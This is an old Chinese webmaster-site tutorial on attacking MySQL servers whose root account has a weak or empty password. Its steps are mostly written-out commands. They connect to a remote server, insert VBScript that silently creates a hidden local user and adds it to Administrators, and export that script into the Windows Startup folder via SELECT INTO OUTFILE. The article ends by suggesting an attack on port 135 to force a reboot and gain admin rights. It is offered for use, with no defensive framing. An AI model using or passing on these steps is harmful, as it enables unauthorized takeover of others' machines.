当前时间 加入收藏 设为首页 联系站长
先锋站长网
您的位置:>首页 -> 技术文章 -> MYSQL编程->MYSQL用户root密码为弱口令的攻击
MYSQL用户root密码为弱口令的攻击
来源: | 作者: | 时间:2008-03-18 21:23:35 | 录入者:admin
1、连接到对方MYSQL 服务器

  mysql -u root -h 192.168.0.1

  mysql.exe 这个程序在你安装了MYSQL的的BIN目录中   

  2、让我们来看看服务器中有些什么数据库

  mysql>show databases;

  MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。   

  3、让我们进入数据库

  mysql>use test;

  我们将会进入test数据库中   

  4、查看我们进入数据库中有些什么数据表

  mysql>show tables;

  默认的情况下,test中没有任何表的存在。

  以下为关键的部分   

  5、在TEST数据库下创建一个新的表;

  mysql>create table a (cmd text);

  好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。   

  6、在表中插入内容

  mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

  mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

  mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

  注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!   

  7、好了,现在我们来看看表a中有些什么

  mysql>select * from a;

  我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步   

  8、输出表为一个VBS的脚本文件

  mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";

  我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意"\"符号。   

  9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。

[上一篇]MySQL 5.0-触发器(参考)来源:N.. [下一篇]如何对MySQL 服务器进行调优
 评 论
称  呼:
内  容:
·本站发布内容均为客观表达作者观点,不代表本站立场,请勿攻击和漫骂
·网游发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
最新文章
站长先锋|先锋站长网 (17日)
企业邮局不断壮大 时代邮箱再.. (26日)
网店办照试行 无本经营亮剑何.. (20日)
CN域名年增长率达94.6% (14日)
解读:“.中国”域名幕后的争.. (14日)
后奥运时代互联网将刮繁体风 (11日)
IE8发布与“.中国”域名系统.. (04日)
抢滩WindowsServer2008 主机.. (28日)
“解百纳”千千结难解 .TM域.. (21日)
奥运商机刺激主机市场供求 (16日)
精彩推荐
站长先锋|先锋站长网 (17日)
企业邮局不断壮大 时代邮箱再添 (26日)
网店办照试行 无本经营亮剑何方 (20日)
CN域名年增长率达94.6% (14日)
解读:“.中国”域名幕后的争夺 (14日)
后奥运时代互联网将刮繁体风 (11日)
IE8发布与“.中国”域名系统启 (04日)
抢滩WindowsServer2008 主机商 (28日)
“解百纳”千千结难解 .TM域名 (21日)
观察:中小网站或渐成互联网主角 (14日)
热门咨询
Fs2You为您提供无限大小免费.. (28日)
用电子商务的网站进行信用卡.. (17日)
免费CN域名注册,每个人最多可.. (28日)
由站长论坛为您提供cn或者com.. (28日)
wap站长大全 (17日)
免费600提供600M免费ASP空间 (28日)
ASP如何获取客户端真实IP地址 (26日)
中国网络为注册会员免费赠送.. (28日)
地方分类信息网站推广重心! (16日)
如何编程删除access表中所有.. (22日)
联系方式:MSN:xFzz@hotmail.com QQ:486031、219741、54817814 电话:010-67216557
Copyright@xFzz.com all rights reserved 京ICP备05047353号
Powered by xFzz Code © 2003-07 bbs.xFzz.com